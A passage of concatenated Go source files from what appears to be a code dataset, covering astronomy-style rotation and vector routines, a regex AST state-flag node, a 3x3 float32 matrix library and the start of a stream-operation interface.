anticlockwise as seen looking towards the origin from positive x.
2) The additional rotation can be represented by this matrix:
( 1 0 0 )
( )
( 0 + cos(phi) + sin(phi) )
( )
( 0 - sin(phi) + cos(phi) )
*/
func Rx(phi float64, r *[3][3]float64) {
var s, c, a10, a11, a12, a20, a21, a22 float64
s = sin(phi)
c = cos(phi)
a10 = c*r[1][0] + s*r[2][0]
a11 = c*r[1][1] + s*r[2][1]
a12 = c*r[1][2] + s*r[2][2]
a20 = -s*r[1][0] + c*r[2][0]
a21 = -s*r[1][1] + c*r[2][1]
a22 = -s*r[1][2] + c*r[2][2]
r[1][0] = a10
r[1][1] = a11
r[1][2] = a12
r[2][0] = a20
r[2][1] = a21
r[2][2] = a22
}
/*
Ry Rotate an r-matrix about the y-axis.
Given:
theta float64 angle (radians)
Given and returned:
r [3][3]float64 r-matrix, rotated
Notes:
1) Calling this function with positive theta incorporates in the
supplied r-matrix r an additional rotation, about the y-axis,
anticlockwise as seen looking towards the origin from positive y.
2) The additional rotation can be represented by this matrix:
( + cos(theta) 0 - sin(theta) )
( )
( 0 1 0 )
( )
( + sin(theta) 0 + cos(theta) )
*/
func Ry(theta float64, r *[3][3]float64) {
var s, c, a00, a01, a02, a20, a21, a22 float64
s = sin(theta)
c = cos(theta)
a00 = c*r[0][0] - s*r[2][0]
a01 = c*r[0][1] - s*r[2][1]
a02 = c*r[0][2] - s*r[2][2]
a20 = s*r[0][0] + c*r[2][0]
a21 = s*r[0][1] + c*r[2][1]
a22 = s*r[0][2] + c*r[2][2]
r[0][0] = a00
r[0][1] = a01
r[0][2] = a02
r[2][0] = a20
r[2][1] = a21
r[2][2] = a22
}
/*
Rz Rotate an r-matrix about the z-axis.
Given:
psi float64 angle (radians)
Given and returned:
r [3][3]float64 r-matrix, rotated
Notes:
1) Calling this function with positive psi incorporates in the
supplied r-matrix r an additional rotation, about the z-axis,
anticlockwise as seen looking towards the origin from positive z.
2) The additional rotation can be represented by this matrix:
( + cos(psi) + sin(psi) 0 )
( )
( - sin(psi) + cos(psi) 0 )
( )
( 0 0 1 )
*/
func Rz(psi float64, r *[3][3]float64) {
var s, c, a00, a01, a02, a10, a11, a12 float64
s = sin(psi)
c = cos(psi)
a00 = c*r[0][0] + s*r[1][0]
a01 = c*r[0][1] + s*r[1][1]
a02 = c*r[0][2] + s*r[1][2]
a10 = -s*r[0][0] + c*r[1][0]
a11 = -s*r[0][1] + c*r[1][1]
a12 = -s*r[0][2] + c*r[1][2]
r[0][0] = a00
r[0][1] = a01
r[0][2] = a02
r[1][0] = a10
r[1][1] = a11
r[1][2] = a12
}
// 4. Spherical/Cartesian Conversions (6)
// Operations involving p-vectors and r-matrices (4)
/*
S2c Convert spherical coordinates to Cartesian.
Given:
theta float64 longitude angle (radians)
phi float64 latitude angle (radians)
Returned:
c [3]float64 direction cosines
*/
func S2c(theta, phi float64, c *[3]float64) {
var cp float64
cp = cos(phi)
c[0] = cos(theta) * cp
c[1] = sin(theta) * cp
c[2] = sin(phi)
}
/*
C2s P-vector to spherical coordinates.
Given:
p [3]float64 p-vector
Returned:
theta float64 longitude angle (radians)
phi float64 latitude angle (radians)
Notes:
1) The vector p can have any magnitude; only its direction is used.
2) If p is null, zero theta and phi are returned.
3) At either pole, zero theta is returned.
*/
func C2s(p [3]float64, theta *float64, phi *float64) {
var x, y, z, d2 float64
x = p[0]
y = p[1]
z = p[2]
d2 = x*x + y*y
if d2 == 0.0 {
*theta = 0.0
} else {
*theta = atan2(y, x)
}
if z == 0.0 {
*phi = 0.0
} else {
*phi = atan2(z, sqrt(d2))
}
}
/*
S2p Convert spherical polar coordinates to p-vector.
Given:
theta float64 longitude angle (radians)
phi float64 latitude angle (radians)
r float64 radial distance
Returned:
p [3]float64 Cartesian coordinates
Called:
S2c spherical coordinates to unit vector
Sxp multiply p-vector by scalar
*/
func S2p(theta, phi, r float64, p *[3]float64) {
u := [3]float64{}
S2c(theta, phi, &u)
Sxp(r, u, p)
}
/*
P2s P-vector to spherical polar coordinates.
Given:
p [3]float64 p-vector
Returned:
theta float64 longitude angle (radians)
phi float64 latitude angle (radians)
r float64 radial distance
Notes:
1) If P is null, zero theta, phi and r are returned.
2) At either pole, zero theta is returned.
Called:
C2s p-vector to spherical
Pm modulus of p-vector
*/
func P2s(p [3]float64, theta *float64, phi *float64, r *float64) {
C2s(p, theta, phi)
*r = Pm(p)
}
// Operations involving pv-vectors (2)
/*
S2pv Convert position/velocity from spherical to Cartesian coordinates.
Given:
theta float64 longitude angle (radians)
phi float64 latitude angle (radians)
r float64 radial distance
td float64 rate of change of theta
pd float64 rate of change of phi
rd float64 rate of change of r
Returned:
pv [2][3]float64 pv-vector
*/
func S2pv(theta, phi, r float64, td, pd, rd float64, pv *[2][3]float64) {
var st, ct, sp, cp, rcp, x, y, rpd, w float64
st = sin(theta)
ct = cos(theta)
sp = sin(phi)
cp = cos(phi)
rcp = r * cp
x = rcp * ct
y = rcp * st
rpd = r * pd
w = rpd*sp - cp*rd
pv[0][0] = x
pv[0][1] = y
pv[0][2] = r * sp
pv[1][0] = -y*td - w*ct
pv[1][1] = x*td - w*st
pv[1][2] = rpd*cp + sp*rd
}
/*
Pv2s Convert position/velocity from Cartesian to spherical coordinates.
Given:
pv [2][3]float64 pv-vector
Returned:
theta float64 longitude angle (radians)
phi float64 latitude angle (radians)
r float64 radial distance
td float64 rate of change of theta
pd float64 rate of change of phi
rd float64 rate of change of r
Notes:
1) If the position part of pv is null, theta, phi, td and pd
are indeterminate. This is handled by extrapolating the
position through unit time by using the velocity part of
pv. This moves the origin without changing the direction
of the velocity component. If the position and velocity
components of pv are both null, zeroes are returned for all
six results.
2) If the position is a pole, theta, td and pd are indeterminate.
In such cases zeroes are returned for all three.
*/
func Pv2s(pv [2][3]float64, theta, phi, r *float64, td, pd, rd *float64) {
var x, y, z, xd, yd, zd, rxy2, rxy, r2, rtrue, rw, xyp float64
/* Components of position/velocity vector. */
x = pv[0][0]
y = pv[0][1]
z = pv[0][2]
xd = pv[1][0]
yd = pv[1][1]
zd = pv[1][2]
/* Component of r in XY plane squared. */
rxy2 = x*x + y*y
/* Modulus squared. */
r2 = rxy2 + z*z
/* Modulus. */
rtrue = sqrt(r2)
/* If null vector, move the origin along the direction of movement. */
rw = rtrue
if rtrue == 0.0 {
x = xd
y = yd
z = zd
rxy2 = x*x + y*y
r2 = rxy2 + z*z
rw = sqrt(r2)
}
/* Position and velocity in spherical coordinates. */
rxy = sqrt(rxy2)
xyp = x*xd + y*yd
if rxy2 != 0.0 {
*theta = atan2(y, x)
*phi = atan2(z, rxy)
*td = (x*yd - y*xd) / rxy2
*pd = (zd*rxy2 - z*xyp) / (r2 * rxy)
} else {
*theta = 0.0
if z != 0.0 {
*phi = atan2(z, rxy)
} else {
*phi = 0.0
}
*td = 0.0
*pd = 0.0
}
*r = rtrue
if rw != 0.0 {
*rd = (xyp + z*zd) / rw
} else {
*rd = 0.0
}
}
// 5. Operations on Vectors (17)
// Operations involving p-vectors and r-matrices (8)
/*
Ppp P-vector addition.
Given:
a [3]float64 first p-vector
b [3]float64 second p-vector
Returned:
apb [3]float64 a + b
Note:
It is permissible to re-use the same array for any of the
arguments.
*/
func Ppp(a, b [3]float64, apb *[3]float64) {
apb[0] = a[0] + b[0]
apb[1] = a[1] + b[1]
apb[2] = a[2] + b[2]
}
/*
Pmp P-vector subtraction.
Given:
a [3]float64 first p-vector
b [3]float64 second p-vector
Returned:
amb [3]float64 a - b
Note:
It is permissible to re-use the same array for any of the
arguments.
*/
func Pmp(a, b [3]float64, amb *[3]float64) {
amb[0] = a[0] - b[0]
amb[1] = a[1] - b[1]
amb[2] = a[2] - b[2]
}
/*
Ppsp P-vector plus scaled p-vector.
Given:
a [3]float64 first p-vector
s float64 scalar (multiplier for b)
b [3]float64 second p-vector
Returned:
apsb [3]float64 a + s*b
Note:
It is permissible for any of a, b and apsb to be the same array.
Called:
Sxp multiply p-vector by scalar
Ppp p-vector plus p-vector
*/
func Ppsp(a [3]float64, s float64, b [3]float64, apsb *[3]float64) {
var sb [3]float64
/* s*b. */
Sxp(s, b, &sb)
/* a + s*b. */
Ppp(a, sb, apsb)
}
/*
Pdp p-vector inner (=scalar=dot) product.
Given:
a [3]float64 first p-vector
b [3]float64 second p-vector
Returned (function value):
float64 a . b
*/
func Pdp(a, b [3]float64) float64 {
w := a[0]*b[0] + a[1]*b[1] + a[2]*b[2]
return w
}
/*
Pxp p-vector outer (=vector=cross) product.
Given:
a [3]float64 first p-vector
b [3]float64 second p-vector
Returned:
axb [3]float64 a x b
Note:
It is permissible to re-use the same array for any of the
arguments.
*/
func Pxp(a, b [3]float64, axb *[3]float64) {
var xa, ya, za, xb, yb, zb float64
xa = a[0]
ya = a[1]
za = a[2]
xb = b[0]
yb = b[1]
zb = b[2]
axb[0] = ya*zb - za*yb
axb[1] = za*xb - xa*zb
axb[2] = xa*yb - ya*xb
}
/*
Pm Modulus of p-vector.
Given:
p [3]float64 p-vector
Returned (function value):
float64 modulus
*/
func Pm(p [3]float64) float64 {
return sqrt(p[0]*p[0] + p[1]*p[1] + p[2]*p[2])
}
/*
Pn Convert a p-vector into modulus and unit vector.
Given:
p [3]float64 p-vector
Returned:
r float64 modulus
u [3]float64 unit vector
Notes:
1) If p is null, the result is null. Otherwise the result is a unit
vector.
2) It is permissible to re-use the same array for any of the
arguments.
Called:
Pm modulus of p-vector
Zp zero p-vector
Sxp multiply p-vector by scalar
*/
func Pn(p [3]float64, r *float64, u *[3]float64) {
var w float64
/* Obtain the modulus and test for zero. */
w = Pm(p)
if w == 0.0 {
/* Null vector. */
Zp(u)
} else {
/* Unit vector. */
Sxp(1.0/w, p, u)
}
/* Return the modulus. */
*r = w
}
/*
Sxp Multiply a p-vector by a scalar.
Given:
s float64 scalar
p [3]float64 p-vector
Returned:
sp [3]float64 s * p
Note:
It is permissible for p and sp to be the same array.
*/
func Sxp(s float64, p [3]float64, sp *[3]float64) {
sp[0] = s * p[0]
sp[1] = s * p[1]
sp[2] = s * p[2]
}
// Operations involving pv-vectors (9)
/*
Pvppv Add one pv-vector to another.
Given:
a [2][3]float64 first pv-vector
b [2][3]float64 second pv-vector
Returned:
apb [2][3]float64 a + b
Note:
It is permissible to re-use the same array for any of the
arguments.
Called:
Ppp p-vector plus p-vector
*/
func Pvppv(a, b [2][3]float64, apb *[2][3]float64) {
Ppp(a[0], b[0], &apb[0])
Ppp(a[1], b[1], &apb[1])
}
/*
Pvmpv Subtract one pv-vector from another.
Given:
a [2][3]float64 first pv-vector
b [2][3]float64 second pv-vector
Returned:
amb [2][3]float64 a - b
Note:
It is permissible to re-use the same array for any of the
arguments.
Called:
Pmp p-vector minus p-vector
*/
func Pvmpv(a, b [2][3]float64, amb *[2][3]float64) {
Pmp(a[0], b[0], &amb[0])
Pmp(a[1], b[1], &amb[1])
}
/*
Pvdpv Inner (=scalar=dot) product of two pv-vectors.
Given:
a [2][3]float64 first pv-vector
b [2][3]float64 second pv-vector
Returned:
adb [2]float64 a . b (see note)
Note:
If the position and velocity components of the two pv-vectors are
( ap, av ) and ( bp, bv ), the result, a . b, is the pair of
numbers ( ap . bp , ap . bv + av . bp ). The two numbers are the
dot-product of the two p-vectors and its derivative.
Called:
Pdp scalar product of two p-vectors
*/
func Pvdpv(a, b [2][3]float64, adb *[2]float64) {
var adbd, addb float64
/* a . b = constant part of result. */
adb[0] = Pdp(a[0], b[0])
/* a . bdot */
adbd = Pdp(a[0], b[1])
/* adot . b */
addb = Pdp(a[1], b[0])
/* Velocity part of result. */
adb[1] = adbd + addb
}
/*
Pvxpv Outer (=vector=cross) product of two pv-vectors.
Given:
a [2][3]float64 first pv-vector
b [2][3]float64 second pv-vector
Returned:
axb [2][3]float64 a x b
Notes:
1) If the position and velocity components of the two pv-vectors are
( ap, av ) and ( bp, bv ), the result, a x b, is the pair of
vectors ( ap x bp, ap x bv + av x bp ). The two vectors are the
cross-product of the two p-vectors and its derivative.
2) It is permissible to re-use the same array for any of the
arguments.
Called:
Cpv copy pv-vector
Pxp vector product of two p-vectors
Ppp p-vector plus p-vector
*/
func Pvxpv(a, b [2][3]float64, axb *[2][3]float64) {
var wa, wb [2][3]float64
var axbd, adxb [3]float64
/* Make copies of the inputs. */
Cpv(a, &wa)
Cpv(b, &wb)
/* a x b = position part of result. */
Pxp(wa[0], wb[0], &axb[0])
/* a x bdot + adot x b = velocity part of result. */
Pxp(wa[0], wb[1], &axbd)
Pxp(wa[1], wb[0], &adxb)
Ppp(axbd, adxb, &axb[1])
}
/*
Pvm Modulus of pv-vector.
Given:
pv [2][3]float64 pv-vector
Returned:
r float64 modulus of position component
s float64 modulus of velocity component
Called:
Pm modulus of p-vector
*/
func Pvm(pv [2][3]float64, r, s *float64) {
/* Distance. */
*r = Pm(pv[0])
/* Speed. */
*s = Pm(pv[1])
}
/*
Sxpv Multiply a pv-vector by a scalar.
Given:
s float64 scalar
pv [2][3]float64 pv-vector
Returned:
spv [2][3]float64 s * pv
Note:
It is permissible for pv and spv to be the same array.
Called:
S2xpv multiply pv-vector by two scalars
*/
func Sxpv(s float64, pv [2][3]float64, spv *[2][3]float64) {
S2xpv(s, s, pv, spv)
}
/*
S2xpv Multiply a pv-vector by two scalars.
Given:
s1 float64 scalar to multiply position component by
s2 float64 scalar to multiply velocity component by
pv [2][3]float64 pv-vector
Returned:
spv [2][3]float64 pv-vector: p scaled by s1, v scaled by s2
Note:
It is permissible for pv and spv to be the same array.
Called:
Sxp multiply p-vector by scalar
*/
func S2xpv(s1, s2 float64, pv [2][3]float64, spv *[2][3]float64) {
Sxp(s1, pv[0], &spv[0])
Sxp(s2, pv[1], &spv[1])
}
/*
Pvu Update a pv-vector.
Given:
dt float64 time interval
pv [2][3]float64 pv-vector
Returned:
upv [2][3]float64 p updated, v unchanged
Notes:
1) "Update" means "refer the position component of the vector
to a new date dt time units from the existing date".
2) The time units of dt must match those of the velocity.
3) It is permissible for pv and upv to be the same array.
Called:
Ppsp p-vector plus scaled p-vector
Cp copy p-vector
*/
func Pvu(dt float64, pv [2][3]float64, upv *[2][3]float64) {
Ppsp(pv[0], dt, pv[1], &upv[0])
Cp(pv[1], &upv[1])
}
/*
Pvup Update a pv-vector, discarding the velocity component.
Status: vector/matrix support function.
Given:
dt float64 time interval
pv [2][3]float64 pv-vector
Returned:
p [3]float64 p-vector
Notes:
1) "Update" means "refer the position component of the vector to a
new date dt time units from the existing date".
2) The time units of dt must match those of the velocity.
*/
func Pvup(dt float64, pv [2][3]float64, p *[3]float64) {
p[0] = pv[0][0] + dt*pv[1][0]
p[1] = pv[0][1] + dt*pv[1][1]
p[2] = pv[0][2] + dt*pv[1][2]
}
// 6. Operations on matrices (2)
/*
Rxr Multiply two r-matrices.
Given:
a [3][3]float64 first r-matrix
b [3][3]float64 second r-matrix
Returned:
atb [3][3]float64 a * b
Note:
It is permissible to re-use the same array for any of the
arguments.
Called:
Cr copy r-matrix
*/
func Rxr(a, b [3][3]float64, atb *[3][3]float64) {
var w float64
var wm [3][3]float64
for i := 0; i < 3; i++ {
for j := 0; j < 3; j++ {
w = 0.0
for k := 0; k < 3; k++ {
w += a[i][k] * b[k][j]
}
wm[i][j] = w
}
}
Cr(wm, atb)
}
/*
Tr Transpose an r-matrix.
Given:
r [3][3]float64 r-matrix
Returned:
rt [3][3]float64 transpose
Note:
It is permissible for r and rt to be the same array.
Called:
Cr copy r-matrix
*/
func Tr(r [3][3]float64, rt *[3][3]float64) {
var wm [3][3]float64
for i := 0; i < 3; i++ {
for j := 0; j < 3; j++ {
wm[i][j] = r[j][i]
}
}
Cr(wm, rt)
}
// 7. Matrix-vector products (4)
// Operations involving p-vectors and r-matrices (2)
/*
Rxp Multiply a p-vector by an r-matrix.
Given:
r [3][3]float64 r-matrix
p [3]float64 p-vector
Returned:
rp [3]float64 r * p
Note:
It is permissible for p and rp to be the same array.
Called:
Cp copy p-vector
*/
func Rxp(r [3][3]float64, p [3]float64, rp *[3]float64) {
var w float64
var wrp [3]float64
//var i, j int
/* Matrix r * vector p. */
for j := 0; j < 3; j++ {
w = 0.0
for i := 0; i < 3; i++ {
w += r[j][i] * p[i]
}
wrp[j] = w
}
/* Return the result. */
Cp(wrp, rp)
}
/*
Trxp Multiply a p-vector by the transpose of an r-matrix.
Given:
r [3][3]float64 r-matrix
p [3]float64 p-vector
Returned:
trp [3]float64 r^T * p
Note:
It is permissible for p and trp to be the same array.
Called:
Tr transpose r-matrix
Rxp product of r-matrix and p-vector
*/
func Trxp(r [3][3]float64, p [3]float64, trp *[3]float64) {
var tr [3][3]float64
/* Transpose of matrix r. */
Tr(r, &tr)
/* Matrix tr * vector p -> vector trp. */
Rxp(tr, p, trp)
}
// Operations involving pv-vectors (2)
/*
Rxpv Multiply a pv-vector by an r-matrix.
Given:
r [3][3]float64 r-matrix
pv [2][3]float64 pv-vector
Returned:
rpv [2][3]float64 r * pv
Notes:
1) The algorithm is for the simple case where the r-matrix r is not
a function of time. The case where r is a function of time leads
to an additional velocity component equal to the product of the
derivative of r and the position vector.
2) It is permissible for pv and rpv to be the same array.
Called:
Rxp product of r-matrix and p-vector
*/
func Rxpv(r [3][3]float64, pv [2][3]float64, rpv *[2][3]float64) {
Rxp(r, pv[0], &rpv[0])
Rxp(r, pv[1], &rpv[1])
}
/*
Trxpv Multiply a pv-vector by the transpose of an r-matrix.
Given:
r [3][3]float64 r-matrix
pv [2][3]float64 pv-vector
Returned:
trpv [2][3]float64 r^T * pv
Notes:
1) The algorithm is for the simple case where the r-matrix r is not
a function of time. The case where r is a function of time leads
to an additional velocity component equal to the product of the
derivative of the transpose of r and the position vector.
2) It is permissible for pv and rpv to be the same array.
Called:
Tr transpose r-matrix
Rxpv product of r-matrix and pv-vector
*/
func Trxpv(r [3][3]float64, pv [2][3]float64, trpv *[2][3]float64) {
var tr [3][3]float64
/* Transpose of matrix r. */
Tr(r, &tr)
/* Matrix tr * vector pv -> vector trpv. */
Rxpv(tr, pv, trpv)
}
// 9. Rotation vectors (2)
/*
Rv2m Form the r-matrix corresponding to a given r-vector.
Given:
w [3]float64 rotation vector (Note 1)
Returned:
r [3][3]float64 rotation matrix
Notes:
1) A rotation matrix describes a rotation through some angle about
some arbitrary axis called the Euler axis. The "rotation vector"
supplied to This function has the same direction as the Euler
axis, and its magnitude is the angle in radians.
2) If w is null, the identity matrix is returned.
3) The reference frame rotates clockwise as seen looking along the
rotation vector from the origin.
*/
func Rv2m(w [3]float64, r *[3][3]float64) {
var x, y, z, phi, s, c, f float64
/* Euler angle (magnitude of rotation vector) and functions. */
x = w[0]
y = w[1]
z = w[2]
phi = sqrt(x*x + y*y + z*z)
s = sin(phi)
c = cos(phi)
f = 1.0 - c
/* Euler axis (direction of rotation vector), perhaps null. */
if phi > 0.0 {
x /= phi
y /= phi
z /= phi
}
/* Form the rotation matrix. */
r[0][0] = x*x*f + c
r[0][1] = x*y*f + z*s
r[0][2] = x*z*f - y*s
r[1][0] = y*x*f - z*s
r[1][1] = y*y*f + c
r[1][2] = y*z*f + x*s
r[2][0] = z*x*f + y*s
r[2][1] = z*y*f - x*s
r[2][2] = z*z*f + c
}
/*
Rm2v Express an r-matrix as an r-vector.
Given:
r [3][3]float64 rotation matrix
Returned:
w [3]float64 rotation vector (Note 1)
Notes:
1) A rotation matrix describes a rotation through some angle about
some arbitrary axis called the Euler axis. The "rotation vector"
returned by this function has the same direction as the Euler axis,
and its magnitude is the angle in radians. (The magnitude and
direction can be separated by means of the function iauPn.)
2) If r is null, so is the result. If r is not a rotation matrix
the result is undefined; r must be proper (i.e. have a positive
determinant) and real orthogonal (inverse = transpose).
3) The reference frame rotates clockwise as seen looking along
the rotation vector from the origin.
*/
func Rm2v(r [3][3]float64, w *[3]float64) {
var x, y, z, s2, c2, phi, f float64
x = r[1][2] - r[2][1]
y = r[2][0] - r[0][2]
z = r[0][1] - r[1][0]
s2 = sqrt(x*x + y*y + z*z)
if s2 > 0 {
c2 = r[0][0] + r[1][1] + r[2][2] - 1.0
phi = atan2(s2, c2)
f = phi / s2
w[0] = x * f
w[1] = y * f
w[2] = z * f
} else {
w[0] = 0.0
w[1] = 0.0
w[2] = 0.0
}
} | vml.go | 0.722037 | 0.612136 | vml.go | starcoder |
package ast
import (
"github.com/lyraproj/goni/goni/state"
"github.com/lyraproj/goni/util"
)
type stateNode struct {
abstractNode
state state.Type
}
func (s *stateNode) AppendTo(w *util.Indenter) {
w.NewLine()
w.Append(`state: `)
s.state.AppendString(w)
}
func (s *stateNode) StateType() state.Type {
return s.state
}
func (s *stateNode) SetMinFixed() {
s.state |= state.MinFixed
}
func (s *stateNode) ClearMinFixed() {
s.state &= ^state.MinFixed
}
func (s *stateNode) SetMaxFixed() {
s.state |= state.MaxFixed
}
func (s *stateNode) ClearMaxFixed() {
s.state &= ^state.MaxFixed
}
func (s *stateNode) SetCLenFixed() {
s.state |= state.CLenFixed
}
func (s *stateNode) ClearCLenFixed() {
s.state &= ^state.CLenFixed
}
func (s *stateNode) SetMark1() {
s.state |= state.Mark1
}
func (s *stateNode) ClearMark1() {
s.state &= ^state.Mark1
}
func (s *stateNode) SetMark2() {
s.state |= state.Mark2
}
func (s *stateNode) ClearMark2() {
s.state &= ^state.Mark2
}
func (s *stateNode) SetMemBackRefed() {
s.state |= state.MemBackRefed
}
func (s *stateNode) ClearMemBackRefed() {
s.state &= ^state.MemBackRefed
}
func (s *stateNode) SetStopBtSimpleRepeat() {
s.state |= state.StopBtSimpleRepeat
}
func (s *stateNode) ClearStopBtSimpleRepeat() {
s.state &= ^state.StopBtSimpleRepeat
}
func (s *stateNode) SetRecursion() {
s.state |= state.Recursion
}
func (s *stateNode) ClearRecursion() {
s.state &= ^state.Recursion
}
func (s *stateNode) SetCalled() {
s.state |= state.Called
}
func (s *stateNode) ClearCalled() {
s.state &= ^state.Called
}
func (s *stateNode) SetAddrFixed() {
s.state |= state.AddrFixed
}
func (s *stateNode) ClearAddrFixed() {
s.state &= ^state.AddrFixed
}
func (s *stateNode) SetNamedGroup() {
s.state |= state.NamedGroup
}
func (s *stateNode) ClearNamedGroup() {
s.state &= ^state.NamedGroup
}
func (s *stateNode) SetNameRef() {
s.state |= state.NameRef
}
func (s *stateNode) ClearNameRef() {
s.state &= ^state.NameRef
}
func (s *stateNode) SetInRepeat() {
s.state |= state.InRepeat
}
func (s *stateNode) ClearInRepeat() {
s.state &= ^state.InRepeat
}
func (s *stateNode) SetNestLevel() {
s.state |= state.NestLevel
}
func (s *stateNode) ClearNestLevel() {
s.state &= ^state.NestLevel
}
func (s *stateNode) SetByNumber() {
s.state |= state.ByNumber
}
func (s *stateNode) ClearByNumber() {
s.state &= ^state.ByNumber
} | ast/statenode.go | 0.576542 | 0.458046 | statenode.go | starcoder |
package math3d32
import "fmt"
type Matrix3 []float32
func MakeMatrix3V(v []float32, rowMajor bool) Matrix3 {
if rowMajor {
// transform the data to OpenGl format
return Matrix3{v[0], v[3], v[6], v[1], v[4], v[7], v[2], v[5], v[8]}[:]
}
return Matrix3{v[0], v[1], v[2], v[3], v[4], v[5], v[6], v[7], v[8]}[:]
}
func MakeMatrix3() Matrix3 {
return Matrix3{.0, .0, .0, .0, .0, .0, .0, .0, .0}[:]
}
func (m Matrix3) Copy() Matrix3 {
return Matrix3{m[0], m[1], m[2], m[3], m[4], m[5], m[6], m[7], m[8]}[:]
}
func (m Matrix3) MakeZero() Matrix3 {
m[0] = .0
m[1] = .0
m[2] = .0
m[3] = .0
m[4] = .0
m[5] = .0
m[6] = .0
m[7] = .0
m[8] = .0
return m
}
func (m Matrix3) MakeIdentity() Matrix3 {
m[0] = 1.
m[4] = 1.
m[8] = 1.
m[1] = .0
m[2] = .0
m[3] = .0
m[5] = .0
m[6] = .0
m[7] = .0
return m
}
func (m Matrix3) Determinant() float32 {
return m[0]*(m[4]*m[8]-m[5]*m[7]) - m[1]*(m[3]*m[8]-m[5]*m[6]) + m[2]*(m[3]*m[7]-m[4]*m[6])
}
func (m Matrix3) MulS(scalar float32) Matrix3 {
s := scalar
return Matrix3{m[0] * s, m[1] * s, m[2] * s, m[3] * s, m[4] * s, m[5] * s, m[6] * s, m[7] * s, m[8] * s}[:]
}
func (m Matrix3) Inverse() Matrix3 {
r := MakeMatrix3()
d := 1.0 / m.Determinant()
r[0] = d * (m[4]*m[8] - m[5]*m[7])
r[1] = -d * (m[1]*m[8] - m[2]*m[7])
r[2] = d * (m[1]*m[5] - m[2]*m[4])
r[3] = -d * (m[3]*m[8] - m[5]*m[6])
r[4] = d * (m[0]*m[8] - m[2]*m[6])
r[5] = -d * (m[0]*m[5] - m[2]*m[3])
r[6] = d * (m[3]*m[7] - m[4]*m[6])
r[7] = -d * (m[0]*m[7] - m[1]*m[6])
r[8] = d * (m[0]*m[4] - m[1]*m[3])
return r
}
func (m Matrix3) Cofactor() Matrix3 {
r := MakeMatrix3()
r[0] = (m[4]*m[8] - m[5]*m[7])
r[1] = -(m[3]*m[8] - m[5]*m[6])
r[2] = (m[3]*m[7] - m[4]*m[6])
r[3] = -(m[1]*m[8] - m[2]*m[7])
r[4] = (m[0]*m[8] - m[2]*m[6])
r[5] = -(m[0]*m[7] - m[1]*m[6])
r[6] = (m[1]*m[5] - m[2]*m[4])
r[7] = -(m[0]*m[5] - m[2]*m[3])
r[8] = (m[0]*m[4] - m[1]*m[3])
return r
}
func (m Matrix3) Equal(q Matrix3) bool {
return m[0] == q[0] && m[3] == q[3] && m[6] == q[6] && m[1] == q[1] && m[4] == q[4] && m[7] == q[7] && m[2] == q[2] && m[5] == q[5] && m[8] == q[8]
}
func (m Matrix3) NotEqual(q Matrix3) bool {
return m[0] != q[0] || m[3] != q[3] || m[6] != q[6] || m[1] != q[1] || m[4] != q[4] || m[7] != q[7] || m[2] != q[2] || m[5] != q[5] || m[8] != q[8]
}
// Mutiply this matrix with a column vector v, resulting in another column vector
func (m Matrix3) MultiplyV(v Vector3) Vector3 {
return Vector3{m[0]*v[0] + m[1]*v[1] + m[2]*v[2],
m[3]*v[0] + m[4]*v[1] + m[5]*v[2],
m[6]*v[0] + m[7]*v[1] + m[8]*v[2]}
}
func (m Matrix3) MultiplyM(q Matrix3) Matrix3 {
r := MakeMatrix3()
r[0] = q[0]*m[0] + q[1]*m[3] + q[2]*m[6]
r[1] = q[0]*m[1] + q[1]*m[4] + q[2]*m[7]
r[2] = q[0]*m[2] + q[1]*m[5] + q[2]*m[8]
r[3] = q[3]*m[0] + q[4]*m[3] + q[5]*m[6]
r[4] = q[3]*m[1] + q[4]*m[4] + q[5]*m[7]
r[5] = q[3]*m[2] + q[4]*m[5] + q[5]*m[8]
r[6] = q[6]*m[0] + q[7]*m[3] + q[8]*m[6]
r[7] = q[6]*m[1] + q[7]*m[4] + q[8]*m[7]
r[8] = q[6]*m[2] + q[7]*m[5] + q[8]*m[8]
return r
}
// Transposed will *not* modify m
func (m Matrix3) Transposed() Matrix3 {
return Matrix3{m[0], m[3], m[6], m[1], m[4], m[7], m[2], m[5], m[8]}[:]
}
// Transpose will modify m
func (m Matrix3) Transpose() Matrix3 {
m[1], m[3] = m[3], m[1]
m[2], m[6] = m[6], m[2]
m[5], m[7] = m[7], m[5]
return m
}
/*
// Orthogonalize will modify this matrix
func (m Matrix3) Orthogonalize(){
i := MakeVector3(m[0],m[1],m[2])
j := MakeVector3(m[3],m[4],m[5])
k := MakeVector3(m[6],m[7],m[8]).Normalize();
i = j.Cross(k).Normalize()
j=k.Cross(i);
m[0]=i[0]; m[3]=j[0]; m[6]=k[0]
m[1]=i[3]; m[4]=j[3]; m[7]=k[3]
m[2]=i[6]; m[5]=j[6]; m[8]=k[6]
}
func (m1 Matrix3) Orthogonalized() Matrix3{
m := m1.Copy()
m.Orthogonalize();
return m;
}
*/
/*
Tests to see if the difference between two matrices,
element-wise, exceeds ε.
*/
func (a Matrix3) ApproxEquals(b Matrix3, ε float32) bool {
for i := 0; i < 9; i++ {
if Fabsf(a[i]-b[i]) > ε {
return false
}
}
return true
}
func (m Matrix3) String() string {
// output in octave format for easy testing
return fmt.Sprintf("[%.5f,%.5f,%.5f;%.5f,%.5f,%.5f;%.5f,%.5f,%.5f]", m[0], m[3], m[6], m[1], m[4], m[7], m[2], m[5], m[8])
} | math3d32/matrix3.go | 0.751375 | 0.530662 | matrix3.go | starcoder |
package terminal
import (
"context"
"github.com/searKing/golang/go/error/exception"
"github.com/searKing/golang/go/util/class"
"github.com/searKing/golang/go/util/optional"
"github.com/searKing/golang/go/util/spliterator"
)
/**
* An operation in a stream pipeline that takes a stream as input and produces
* a result or side-effect. A {@code Op} has an input type and stream
* shape, and a result type. A {@code Op} also has a set of
* <em>operation flags</em> that describes how the operation processes elements
* of the stream (such as short-circuiting or respecting encounter order; see
* {@link StreamOpFlag}).
*
* <p>A {@code Op} must provide a sequential and parallel implementation
* of the operation relative to a given stream source and set of intermediate
* operations.
*
* @param <E_IN> the type of input elements
* @param <R> the type of the result
* @since 1.8
*/
type Operation interface {
/**
* Gets the stream flags of the operation. Terminal operations may set a
* limited subset of the stream flags defined in {@link StreamOpFlag}, and
* these flags are combined with the previously combined stream and
* intermediate operation flags for the pipeline.
*
* @implSpec The default implementation returns zero.
*
* @return the stream flags for this operation
* @see StreamOpFlag
*/
GetOpFlags() int
/**
* Performs a parallel evaluation of the operation using the specified
* {@code PipelineHelper}, which describes the upstream intermediate
* operations.
*
* @implSpec The default performs a sequential evaluation of the operation
* using the specified {@code PipelineHelper}.
*
* @param helper the pipeline helper
* @param spliterator the source spliterator
* @return the result of the evaluation
*/
EvaluateParallel(ctx context.Context, spliterator spliterator.Spliterator) optional.Optional
/**
* Performs a sequential evaluation of the operation using the specified
